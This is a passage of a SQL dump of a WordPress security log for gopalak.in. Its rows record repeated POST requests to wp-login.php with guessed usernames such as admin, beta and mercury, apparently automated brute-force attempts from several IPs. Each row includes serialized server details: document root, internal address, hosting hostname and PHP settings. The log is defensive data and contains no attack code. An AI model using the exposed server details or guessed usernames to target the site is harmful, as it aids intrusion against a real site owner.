s:12:\"REQUEST_TIME\";i:1746743000;}}','35.154.1.88',1,'2025-05-09 03:53:21','2025-05-10 07:10:34'),(94984,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45172\";s:11:\"REMOTE_ADDR\";s:13:\"162.241.92.55\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746743239.781914;s:12:\"REQUEST_TIME\";i:1746743239;}}','162.241.92.55',0,'2025-05-09 03:57:21','1970-01-01 00:00:00'),(94985,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"48660\";s:11:\"REMOTE_ADDR\";s:12:\"91.151.95.70\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746743823.9423289;s:12:\"REQUEST_TIME\";i:1746743823;}}','91.151.95.70',0,'2025-05-09 04:07:05','1970-01-01 00:00:00'),(94986,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54597\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746744287.3879609;s:12:\"REQUEST_TIME\";i:1746744287;}}','35.154.1.88',1,'2025-05-09 04:14:50','2025-05-10 07:10:32'),(94987,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54601\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746744287.388536;s:12:\"REQUEST_TIME\";i:1746744287;}}','35.154.1.88',1,'2025-05-09 04:14:50','2025-05-10 07:10:33'),(94988,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54600\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746744289.18189;s:12:\"REQUEST_TIME\";i:1746744289;}}','35.154.1.88',1,'2025-05-09 04:14:50','2025-05-10 07:10:31'),(94989,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54599\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746744289.1825211;s:12:\"REQUEST_TIME\";i:1746744289;}}','35.154.1.88',1,'2025-05-09 04:14:50','2025-05-10 07:10:33'),(94990,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54602\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746744290.123127;s:12:\"REQUEST_TIME\";i:1746744290;}}','35.154.1.88',1,'2025-05-09 04:14:51','2025-05-10 07:10:34'),(94991,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"46276\";s:11:\"REMOTE_ADDR\";s:13:\"199.188.201.3\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746744411.1958699;s:12:\"REQUEST_TIME\";i:1746744411;}}','199.188.201.3',0,'2025-05-09 04:16:52','1970-01-01 00:00:00'),(94992,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42290\";s:11:\"REMOTE_ADDR\";s:13:\"95.217.147.99\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746744992.132719;s:12:\"REQUEST_TIME\";i:1746744992;}}','95.217.147.99',0,'2025-05-09 04:26:33','1970-01-01 00:00:00'),(94993,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41044\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.229.109\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746745579.263181;s:12:\"REQUEST_TIME\";i:1746745579;}}','162.0.229.109',0,'2025-05-09 04:36:21','1970-01-01 00:00:00'),(94994,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51985\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746745590.1177709;s:12:\"REQUEST_TIME\";i:1746745590;}}','35.154.1.88',1,'2025-05-09 04:36:31','2025-05-10 07:10:31'),(94995,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; 